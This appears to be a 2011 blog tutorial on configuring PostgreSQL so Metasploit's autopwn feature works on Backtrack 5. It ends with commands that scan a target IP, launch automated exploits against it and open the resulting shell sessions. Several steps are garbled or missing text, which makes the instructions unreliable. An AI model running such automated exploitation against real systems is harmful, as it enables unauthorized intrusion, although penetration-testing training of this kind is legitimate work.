Metasploit Autopwn fix for Backtack 5 with postgreSQL
A lot of people are having trouble with Metasploit's Autopwn feature in Backtrack 5. It does require a little bit of tweaking to get going, below are a few steps to get you on your way.
I prefer to use postgreSQL over MySQL. This tutorial will only show how to properly configure Autopwn using postgreSQL.
First you must determine if you have postgres installed on your system. To do this type the following into a terminal:
ls /etc/init.d/ | grep post
Code:
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s
#ssl = true # (change requires restart) You simply comment it out like I did above with the "#" sign.
Now restart postgres:
/etc/init.d/postgresql-8.4 start
Now connect to the server and change the password to whatever you want:
sudo su postgres -c psql
ALTER USER postgres WITH PASSWORD 'yoursecretpasswd ';
(make sure to use the quotation marks when setting your password, here is a real life example)
ALTER USER postgres WITH PASSWORD 'swordfish ';q sudo passwd -d postgres
sudo su postgres -c passwd
(Here you want to use the same password you used a few steps back)
Postgresql is all setup, now to Metasploit.
Start Metasploit by typing: msfconsole
Once Metasploit starts, type: db_driver
If the driver is already loaded it will give an ouput like below.
If not, you will need to manaully load the driver by typing: db_driver postgresql
Now all you have to do is connect to your database by typing (pentest is the name of the database):
db_connect postgres:[email protected]/metasploit
We are now connected and ready to run autopwn.
Run a nmap scan on the target:
db_nmap 192.68.12.99 To see all of autopwn's options type: db_autopwn
Finally launch the autopwn and let sit back and wait:
db_autopwn -p -t -e -r
After autopwn completes type:
sessions -l Any successfull attacks will result in a session. To interact with that session type:
sessions -i 1 (where 1 is the session number)
原文:http://rootbook0.blogspot.com/2011/07/metasploit-autopwn-fix-for-backtack-5.html